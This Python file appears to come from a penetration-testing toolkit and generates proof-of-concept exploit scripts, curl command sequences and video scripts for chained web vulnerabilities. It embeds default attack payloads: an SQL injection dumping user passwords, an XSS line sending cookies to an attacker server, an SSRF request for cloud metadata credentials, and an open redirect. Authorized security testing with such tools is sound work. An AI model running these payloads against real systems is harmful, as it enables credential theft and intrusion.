#!/usr/bin/env python3
"""
Chain PoC Generator - vuln-chain-composer
Generates Python scripts and curl commands that demonstrate full chain exploitation.
Author: orizon.one
"""

import argparse
import json
import textwrap
from pathlib import Path
from datetime import datetime


def log(msg):
    print(f"[*] {msg}")


def success(msg):
    print(f"[+] {msg}")


def warn(msg):
    print(f"[!] {msg}")


def generate_curl_command(step, finding):
    """Generate a curl command for a single exploitation step."""
    url = finding.get("url", step.get("target", "https://TARGET"))
    method = finding.get("method", "GET")
    payload = finding.get("payload", "")
    parameter = finding.get("parameter", "")
    vuln_type = finding.get("type", "")

    if "sqli" in vuln_type:
        if payload:
            inject_payload = payload
        else:
            inject_payload = "' UNION SELECT username,password FROM users--"
        if method == "GET":
            return f"curl -s -k '{url}?{parameter}={inject_payload}'"
        else:
            return f"curl -s -k -X POST '{url}' -d '{parameter}={inject_payload}'"

    elif "xss" in vuln_type:
        xss_payload = payload or "<script>document.location='https://ATTACKER_SERVER/steal?c='+document.cookie</script>"
        if method == "GET":
            return f"curl -s -k '{url}?{parameter}={xss_payload}'"
        else:
            return f"curl -s -k -X POST '{url}' -d '{parameter}={xss_payload}'"

    elif "ssrf" in vuln_type:
        ssrf_target = payload or "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        if method == "GET":
            return f"curl -s -k '{url}?{parameter}={ssrf_target}'"
        else:
            return f"curl -s -k -X POST '{url}' -d '{parameter}={ssrf_target}'"

    elif "idor" in vuln_type or "bola" in vuln_type:
        return f"# Authenticate first, then:\ncurl -s -k '{url}' -H 'Cookie: session=YOUR_SESSION' \\\n  # Change ID parameter to access other users' data"

    elif "redirect" in vuln_type:
        return f"curl -s -k -L '{url}?redirect=https://ATTACKER_SERVER/capture'"

    elif "takeover" in vuln_type:
        return f"# Verify dangling CNAME:\ndig {finding.get('domain', 'TARGET')} CNAME\n# Check if target service is claimable"

    elif "jwt" in vuln_type:
        return (
            "# Decode JWT:\n"
            "echo 'YOUR_JWT_TOKEN' | cut -d'.' -f2 | base64 -d 2>/dev/null\n"
            "# Modify claims and re-sign (or use alg:none)"
        )

    elif "bucket" in vuln_type:
        return f"curl -s -k '{url}' | head -50\n# Or: aws s3 ls s3://BUCKET_NAME --no-sign-request"

    elif "ssti" in vuln_type:
        ssti_payload = payload or "{{7*7}}"
        return f"curl -s -k '{url}' -d '{parameter}={ssti_payload}'"

    else:
        if method == "GET":
            return f"curl -s -k '{url}'"
        else:
            return f"curl -s -k -X POST '{url}' -d '{parameter}={payload or \"test\"}'"


def generate_python_poc(chain):
    """Generate a complete Python PoC script for a chain."""
    chain_name = chain.get("name", "Unknown Chain")
    phases = chain.get("phases", [])
    primary = chain.get("primary_finding", chain.get("original_correlation", {}).get("primary_finding", {}))

    lines = []
    lines.append('#!/usr/bin/env python3')
    lines.append('"""')
    lines.append(f'PoC: {chain_name}')
    lines.append(f'Generated by vuln-chain-composer (orizon.one)')
    lines.append(f'AUTHORIZED TESTING ONLY - DO NOT USE WITHOUT PERMISSION')
    lines.append('"""')
    lines.append('')
    lines.append('import http.client')
    lines.append('import json')
    lines.append('import ssl')
    lines.append('import sys')
    lines.append('import time')
    lines.append('from urllib.parse import urlparse, urlencode, quote')
    lines.append('')
    lines.append('')
    lines.append('# Configuration - UPDATE THESE VALUES')
    lines.append(f'TARGET = "{primary.get("url", "https://TARGET")}"')
    lines.append('SESSION_COOKIE = "YOUR_SESSION_COOKIE"')
    lines.append('ATTACKER_SERVER = "https://YOUR_ATTACKER_SERVER"')
    lines.append('')
    lines.append('# Disable SSL verification for testing')
    lines.append('CTX = ssl.create_default_context()')
    lines.append('CTX.check_hostname = False')
    lines.append('CTX.verify_mode = ssl.CERT_NONE')
    lines.append('')
    lines.append('')
    lines.append('def make_request(url, method="GET", data=None, headers=None, follow_redirects=True):')
    lines.append('    """Make HTTP request using standard library."""')
    lines.append('    parsed = urlparse(url)')
    lines.append('    scheme = parsed.scheme or "https"')
    lines.append('    host = parsed.hostname')
    lines.append('    port = parsed.port or (443 if scheme == "https" else 80)')
    lines.append('    path = parsed.path or "/"')
    lines.append('    if parsed.query:')
    lines.append('        path += "?" + parsed.query')
    lines.append('')
    lines.append('    if scheme == "https":')
    lines.append('        conn = http.client.HTTPSConnection(host, port, context=CTX, timeout=10)')
    lines.append('    else:')
    lines.append('        conn = http.client.HTTPConnection(host, port, timeout=10)')
    lines.append('')
    lines.append('    if headers is None:')
    lines.append('        headers = {}')
    lines.append('    headers.setdefault("User-Agent", "Mozilla/5.0 (PoC/vuln-chain-composer)")')
    lines.append('')
    lines.append('    body = None')
    lines.append('    if data:')
    lines.append('        if isinstance(data, dict):')
    lines.append('            body = urlencode(data)')
    lines.append('            headers.setdefault("Content-Type", "application/x-www-form-urlencoded")')
    lines.append('        else:')
    lines.append('            body = data')
    lines.append('')
    lines.append('    try:')
    lines.append('        conn.request(method, path, body=body, headers=headers)')
    lines.append('        resp = conn.getresponse()')
    lines.append('        response_data = resp.read().decode("utf-8", errors="replace")')
    lines.append('        return {')
    lines.append('            "status": resp.status,')
    lines.append('            "headers": dict(resp.getheaders()),')
    lines.append('            "body": response_data,')
    lines.append('        }')
    lines.append('    except Exception as e:')
    lines.append('        return {"status": 0, "headers": {}, "body": str(e)}')
    lines.append('    finally:')
    lines.append('        conn.close()')
    lines.append('')
    lines.append('')

    # Generate step functions
    step_funcs = []
    for phase_idx, phase in enumerate(phases):
        if not phase.get("detailed_steps"):
            # Handle simpler chain format (from correlate.py directly)
            continue

        func_name = f"step_{phase_idx + 1}_{phase.get('phase', 'unknown').lower().replace(' ', '_')}"
        step_funcs.append(func_name)

        lines.append(f'def {func_name}(context):')
        lines.append(f'    """Phase: {phase.get("phase", "Unknown")} - {phase.get("technique", "")}"""')
        lines.append(f'    print(f"\\n[*] Phase {phase_idx + 1}: {phase.get("phase", "")}")')
        lines.append(f'    print(f"    Technique: {phase.get("technique", "")}")')
        lines.append(f'    print(f"    Target: {phase.get("target", "")}")')
        lines.append('')

        for step in phase.get("detailed_steps", []):
            action = step.get("action", "").replace('"', '\\"')
            lines.append(f'    print(f"    Step {step.get("step", "?")}: {action}")')

        lines.append('')
        lines.append(f'    # TODO: Implement actual exploitation for {phase.get("technique", "this phase")}')
        lines.append(f'    target_url = context.get("target", TARGET)')
        lines.append(f'    resp = make_request(target_url)')
        lines.append(f'    print(f"    Response: {{resp[\'status\']}}")')
        lines.append('')
        lines.append(f'    # Store results for next phase')
        lines.append(f'    context["phase_{phase_idx + 1}_result"] = resp')
        lines.append(f'    context["phase_{phase_idx + 1}_success"] = resp["status"] in (200, 301, 302)')
        lines.append('')
        lines.append(f'    if not context["phase_{phase_idx + 1}_success"]:')
        lines.append(f'        print(f"    [!] Phase {phase_idx + 1} may have failed - review manually")')
        lines.append(f'    else:')
        lines.append(f'        print(f"    [+] Phase {phase_idx + 1} completed")')
        lines.append('')
        lines.append(f'    return context')
        lines.append('')
        lines.append('')

    # Handle chains from correlate.py directly (no phases, just steps)
    if not step_funcs:
        steps = chain.get("steps", [])
        original = chain.get("original_correlation", chain)
        steps = original.get("steps", steps)
        for step_idx, step_text in enumerate(steps):
            func_name = f"step_{step_idx + 1}"
            step_funcs.append(func_name)
            safe_text = step_text.replace('"', '\\"')
            lines.append(f'def {func_name}(context):')
            lines.append(f'    """Step {step_idx + 1}: {safe_text}"""')
            lines.append(f'    print(f"\\n[*] Step {step_idx + 1}: {safe_text}")')
            lines.append(f'    # TODO: Implement this step')
            lines.append(f'    target_url = context.get("target", TARGET)')
            lines.append(f'    resp = make_request(target_url)')
            lines.append(f'    print(f"    Response: {{resp[\'status\']}}")')
            lines.append(f'    context["step_{step_idx + 1}_result"] = resp')
            lines.append(f'    return context')
            lines.append('')
            lines.append('')

    # Main execution
    lines.append('def main():')
    lines.append(f'    print("=" * 60)')
    lines.append(f'    print(f"  PoC: {chain_name}")')
    lines.append(f'    print(f"  Target: {{TARGET}}")')
    lines.append(f'    print(f"  WARNING: Authorized testing only!")')
    lines.append(f'    print("=" * 60)')
    lines.append('')
    lines.append('    context = {')
    lines.append('        "target": TARGET,')
    lines.append('        "session_cookie": SESSION_COOKIE,')
    lines.append('        "attacker_server": ATTACKER_SERVER,')
    lines.append('    }')
    lines.append('')

    for func_name in step_funcs:
        lines.append(f'    context = {func_name}(context)')
        lines.append(f'    time.sleep(1)  # Rate limiting')
        lines.append('')

    lines.append(f'    print("\\n" + "=" * 60)')
    lines.append(f'    print("  CHAIN EXECUTION COMPLETE")')
    lines.append(f'    print("=" * 60)')
    lines.append('')
    lines.append('    # Summarize results')
    lines.append('    for key, value in context.items():')
    lines.append('        if key.endswith("_success"):')
    lines.append('            status = "SUCCESS" if value else "NEEDS REVIEW"')
    lines.append('            print(f"  {key}: {status}")')
    lines.append('')
    lines.append('')
    lines.append('if __name__ == "__main__":')
    lines.append('    main()')
    lines.append('')

    return "\n".join(lines)


def generate_curl_sequence(chain):
    """Generate a sequence of curl commands for the chain."""
    lines = []
    lines.append(f"#!/bin/bash")
    lines.append(f"# PoC: {chain.get('name', 'Unknown Chain')}")
    lines.append(f"# Generated by vuln-chain-composer (orizon.one)")
    lines.append(f"# AUTHORIZED TESTING ONLY")
    lines.append(f"")
    lines.append(f"set -e")
    lines.append(f"")
    lines.append(f"echo '=== Chain PoC: {chain.get('name', '')} ==='")
    lines.append(f"echo ''")

    # Get findings from chain structure
    primary = chain.get("primary_finding", chain.get("original_correlation", {}).get("primary_finding", {}))
    supporting = chain.get("supporting_findings", chain.get("original_correlation", {}).get("supporting_findings", []))

    all_findings = [primary] + supporting
    steps = chain.get("steps", [])

    # From phases if available
    phases = chain.get("phases", [])
    if phases:
        step_num = 0
        for phase in phases:
            lines.append(f"echo '--- {phase.get('phase', 'Step')} ---'")
            finding = {"url": phase.get("target", ""), "type": phase.get("technique", ""), "method": "GET"}
            # Try to find matching finding
            fid = phase.get("finding_id", "")
            for af in all_findings:
                if isinstance(af, dict) and af.get("id", "") == fid:
                    finding = af
                    break
            for step in phase.get("detailed_steps", []):
                step_num += 1
                action = step.get("action", "")
                lines.append(f"echo 'Step {step_num}: {action}'")
            curl = generate_curl_command(phase, finding)
            lines.append(curl)
            lines.append("echo ''")
            lines.append("")
    else:
        # From simple steps
        for i, step_text in enumerate(steps):
            lines.append(f"echo 'Step {i+1}: {step_text}'")
            finding = all_findings[min(i, len(all_findings) - 1)] if all_findings else {}
            if isinstance(finding, dict):
                curl = generate_curl_command({"target": finding.get("url", "")}, finding)
                lines.append(curl)
            lines.append("echo ''")
            lines.append("")

    lines.append(f"echo '=== Chain PoC Complete ==='")
    lines.append("")

    return "\n".join(lines)


def generate_video_script(chain):
    """Generate a narrated video script for PoC recording."""
    lines = []
    chain_name = chain.get("name", "Unknown Chain")
    severity = chain.get("chain_severity", chain.get("overall_severity", "HIGH"))
    description = chain.get("description", "")

    lines.append(f"VIDEO PoC SCRIPT: {chain_name}")
    lines.append(f"{'=' * 60}")
    lines.append("")
    lines.append(f"INTRO (5 seconds):")
    lines.append(f'  Show: Title card with "{chain_name}"')
    lines.append(f"  Narrate: \"This proof of concept demonstrates a {severity}-severity")
    lines.append(f'  vulnerability chain. {description}\"')
    lines.append("")

    phases = chain.get("phases", [])
    steps = chain.get("steps", [])

    if phases:
        for i, phase in enumerate(phases):
            lines.append(f"SCENE {i+1}: {phase.get('phase', 'Step')} ({phase.get('technique', '')})")
            lines.append(f"  Target: {phase.get('target', '')}")
            for step in phase.get("detailed_steps", []):
                lines.append(f"  Action: {step.get('action', '')}")
                lines.append(f"  Show: Response/evidence on screen")
            lines.append(f"  Narrate: Explain what was achieved and how it enables the next step")
            lines.append("")
    else:
        for i, step_text in enumerate(steps):
            lines.append(f"SCENE {i+1}:")
            lines.append(f"  Action: {step_text}")
            lines.append(f"  Show: Browser/terminal with exploitation")
            lines.append(f"  Narrate: Explain the step and its significance")
            lines.append("")

    lines.append(f"OUTRO (10 seconds):")
    lines.append(f'  Show: Summary of impact')
    lines.append(f'  Narrate: "This chain demonstrates {severity} impact through')
    lines.append(f'  combining multiple vulnerabilities. Remediation recommendations')
    lines.append(f'  are included in the written report."')
    lines.append("")

    return "\n".join(lines)


def main():
    parser = argparse.ArgumentParser(description="Chain PoC Generator - orizon.one")
    parser.add_argument("--input", "-i", required=True, help="Chains JSON file (output of build_chains.py or calculate_impact.py)")
    parser.add_argument("--output", "-o", help="Output JSON file")
    parser.add_argument("--output-dir", "-d", help="Directory to write individual PoC scripts")
    args = parser.parse_args()

    log("Generating chain PoC scripts...")

    with open(args.input) as f:
        data = json.load(f)

    chains = data.get("chains", [])
    log(f"Loaded {len(chains)} chains for PoC generation")

    if not chains:
        warn("No chains found in input.")
        return

    poc_results = []
    output_dir = None
    if args.output_dir:
        output_dir = Path(args.output_dir)
        output_dir.mkdir(parents=True, exist_ok=True)

    for i, chain in enumerate(chains):
        chain_name = chain.get("name", f"chain_{i+1}")
        safe_name = chain_name.lower().replace(" ", "_").replace("+", "and").replace("=", "eq")[:50]

        # Generate all PoC types
        python_poc = generate_python_poc(chain)
        curl_poc = generate_curl_sequence(chain)
        video_script = generate_video_script(chain)

        poc_entry = {
            "chain_name": chain_name,
            "chain_severity": chain.get("chain_severity", chain.get("overall_severity", "HIGH")),
            "python_poc": python_poc,
            "curl_poc": curl_poc,
            "video_script": video_script,
        }
        poc_results.append(poc_entry)

        # Write individual files if output dir specified
        if output_dir:
            py_path = output_dir / f"poc_{safe_name}.py"
            with open(py_path, "w") as f:
                f.write(python_poc)
            success(f"Written: {py_path}")

            sh_path = output_dir / f"poc_{safe_name}.sh"
            with open(sh_path, "w") as f:
                f.write(curl_poc)
            success(f"Written: {sh_path}")

            txt_path = output_dir / f"video_script_{safe_name}.txt"
            with open(txt_path, "w") as f:
                f.write(video_script)
            success(f"Written: {txt_path}")

        success(f"Generated PoC for: {chain_name}")

    output = {
        "meta": {
            "timestamp": datetime.utcnow().isoformat() + "Z",
            "type": "chain_poc",
            "tool": "vuln-chain-composer by orizon.one",
            "chains_processed": len(poc_results),
        },
        "pocs": poc_results,
    }

    output_path = args.output or "chain_pocs.json"
    with open(output_path, "w") as f:
        json.dump(output, f, indent=2)
    success(f"Results saved to: {output_path}")

    print(f"\n{'='*60}")
    print(f"  PoC GENERATION SUMMARY")
    print(f"{'='*60}")
    print(f"  Chains processed  : {len(poc_results)}")
    print(f"  PoC types per chain: Python script, curl sequence, video script")
    if output_dir:
        print(f"  Output directory  : {output_dir}")
    print(f"\n  Generated PoCs:")
    for i, poc in enumerate(poc_results):
        print(f"    {i+1}. {poc['chain_name']} [{poc['chain_severity']}]")
        print(f"       Python: {len(poc['python_poc'].splitlines())} lines")
        print(f"       Curl:   {len(poc['curl_poc'].splitlines())} lines")
    print(f"{'='*60}\n")


if __name__ == "__main__":
    main()
